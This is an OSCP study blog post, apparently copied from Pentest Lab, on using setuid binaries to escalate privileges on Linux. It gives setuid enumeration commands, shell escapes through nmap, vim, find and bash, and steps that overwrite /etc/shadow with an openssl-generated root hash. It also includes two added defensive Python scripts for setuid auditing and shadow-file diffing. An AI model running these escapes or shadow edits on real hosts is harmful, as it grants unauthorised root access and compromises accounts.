Furrukh Taj

Infosec Enthusiast

Exploiting SUIDS for Privilege Escalation

08 Nov 2018 » hacking, security, privilege-escalation, oscp

Original Post: Pentest Lab

-- Another copy/paste, for my own reference, that I used for OSCP.
-- Known Linux executables that can allow privilege escalation when they are setuid root:

  • nmap
  • vim
  • find
  • bash
  • more
  • less
  • nano
  • cp

-- Find the setuid files that can be exploited to gain root access:

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
find / -perm -4000 -exec ls -l {} \;
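The four find one-liners above answer the attacker's question ("which setuid binaries are here?"); the same enumeration is what a defender should run on a baseline image and on live hosts so that a stray setuid copy of one of the listed binaries is noticed before anyone needs it. The Python script below is an added example, not part of the original post or of Pentest Lab: it walks a tree the way `find ROOT -perm -4000 -type f` does, then marks each hit as `escape` (basename is on the post's list), `new` (not in a caller-supplied baseline of known setuid paths), or `known`. The `WATCHLIST`, `find_suid` and `audit_suid` names and the baseline-set idea are assumptions of this example.

```python
import os
import stat
import sys

# Binaries from the post's list: a setuid-root copy of any of these is a
# well-known shell escape and should not exist on a hardened host.
WATCHLIST = {"nmap", "vim", "find", "bash", "more", "less", "nano", "cp"}


def find_suid(root):
    """Return (path, owner_uid, permission_bits) for every regular file
    under `root` with the setuid bit set; equivalent to
    `find ROOT -perm -4000 -type f`.  Symlinks are not followed."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry; find would print an error
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid, stat.S_IMODE(st.st_mode)))
    return hits


def audit_suid(root, baseline=frozenset()):
    """Classify setuid files under `root`.

    baseline: set of absolute paths that are expected to be setuid (taken
    from a known-good image).  Anything else is reported as 'new', and a
    basename on WATCHLIST is always reported as 'escape' regardless of the
    baseline, because those binaries hand out a shell when setuid.
    """
    report = []
    for path, uid, mode in find_suid(root):
        if os.path.basename(path) in WATCHLIST:
            verdict = "escape"
        elif path not in baseline:
            verdict = "new"
        else:
            verdict = "known"
        report.append({"path": path, "uid": uid, "mode": oct(mode), "verdict": verdict})
    return report


if __name__ == "__main__":
    # Usage: python3 suid_audit.py [ROOT]   (ROOT defaults to /)
    top = sys.argv[1] if len(sys.argv) > 1 else "/"
    for entry in audit_suid(top):
        if entry["verdict"] != "known":
            print(f'{entry["verdict"]:7} uid={entry["uid"]} {entry["mode"]} {entry["path"]}')
```

Running it with an empty baseline lists every setuid file, which is the same output the find commands give; feeding it the path set recorded from a clean install turns that into a change report, and a `uid` other than 0 on a watchlisted name is still worth a look because the binary escapes to that user rather than root.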

nmap <= 5.21

nmap -V
nmap --interactive
nmap> !sh
sh-3.2# whoami

vim

Press the ESC key, then:

:set shell=/bin/sh

find

touch me
find me -exec whoami \;

-- Now, to gain root access, we can get a reverse shell using nc, or update the /etc/shadow file with a password hash generated using openssl:

openssl passwd -1 -salt xyz yourpass
makepasswd --clearfrom=- --crypt-md5 <<< YourPass

-- Take the hash from the above output, put it in the password field of the root entry, and write the updated shadow file back.

bash

bash -p
bash-3.2# id

more & less

less /etc/passwd

nano

-- Use nano to edit the /etc/shadow file.

cp

-- Copy the shadow file, add the password hash to it, then copy the new one back over /etc/shadow:

cp /etc/shadow /tmp/shadow
openssl passwd -1 -salt xyz yourpass
vi /tmp/shadow
cp /tmp/shadow /etc/shadow
su root
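Both shadow-file routes above (editing the hash in place, or copying a modified file back with a setuid cp) leave the same trace: the second field of one or more /etc/shadow lines changes, a locked account suddenly has a real hash, or an account appears that was never in the baseline. The script below is an added example, not part of the original post or of Pentest Lab; it diffs a saved copy of /etc/shadow against the current file and reports exactly those changes. It also singles out hashes starting with `$1$`, which is the MD5-crypt format `openssl passwd -1` emits, since a host whose policy is SHA-512 (`$6$`) should never grow one. The sample shadow contents, the account names and the `PLACEHOLDER` hash strings are constructed for this example and are not real credential material; `parse_shadow` and `diff_shadow` are names chosen here.

```python
# Constructed sample data: a baseline snapshot of /etc/shadow and a later copy.
# Hash fields are placeholders, not real hashes.
BASELINE_SHADOW = """\
root:$6$PLACEHOLDER_ROOT_HASH:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
www-data:*:18000:0:99999:7:::
alice:$6$PLACEHOLDER_ALICE_HASH:18000:0:99999:7:::
"""

CURRENT_SHADOW = """\
root:$1$xyz$PLACEHOLDER_MD5_HASH:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
www-data:$6$PLACEHOLDER_NEW_HASH:18000:0:99999:7:::
alice:$6$PLACEHOLDER_ALICE_HASH:18000:0:99999:7:::
backdoor:$6$PLACEHOLDER_BACKDOOR_HASH:18000:0:99999:7:::
"""


def parse_shadow(text):
    """Map account name -> password field (second colon-separated field)
    for every non-empty line of shadow(5)-formatted text."""
    entries = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue  # not a shadow record; skip rather than guess
        entries[fields[0]] = fields[1]
    return entries


def is_locked(pw_field):
    """shadow(5): '*', '!', '!!' or a leading '!' means no password login."""
    return pw_field in ("", "*", "!", "!!") or pw_field.startswith("!")


def diff_shadow(baseline_text, current_text):
    """Return a list of (account, finding) for accounts whose password field
    differs from the baseline.  Findings, in order of appearance:
      added            account not present in the baseline
      login-enabled    was locked in the baseline, now has a usable hash
      changed-weak-md5 hash changed and is now MD5-crypt ($1$)
      changed          hash changed to some other value
      removed          account present in the baseline but gone now
    """
    base = parse_shadow(baseline_text)
    cur = parse_shadow(current_text)
    findings = []
    for name, pw in cur.items():
        if name not in base:
            findings.append((name, "added"))
        elif pw != base[name]:
            if is_locked(base[name]) and not is_locked(pw):
                findings.append((name, "login-enabled"))
            elif pw.startswith("$1$"):
                findings.append((name, "changed-weak-md5"))
            else:
                findings.append((name, "changed"))
    for name in base:
        if name not in cur:
            findings.append((name, "removed"))
    return findings


if __name__ == "__main__":
    # Replace the sample strings with open("/etc/shadow.baseline").read()
    # and open("/etc/shadow").read() on a real host (needs root to read).
    for account, finding in diff_shadow(BASELINE_SHADOW, CURRENT_SHADOW):
        print(f"{finding:17} {account}")
```

On the constructed sample this reports root as `changed-weak-md5`, www-data as `login-enabled` and `backdoor` as `added`; a legitimate password change shows up as plain `changed` on the account that changed it, which is why the diff is only useful when the baseline copy is kept somewhere the host cannot rewrite.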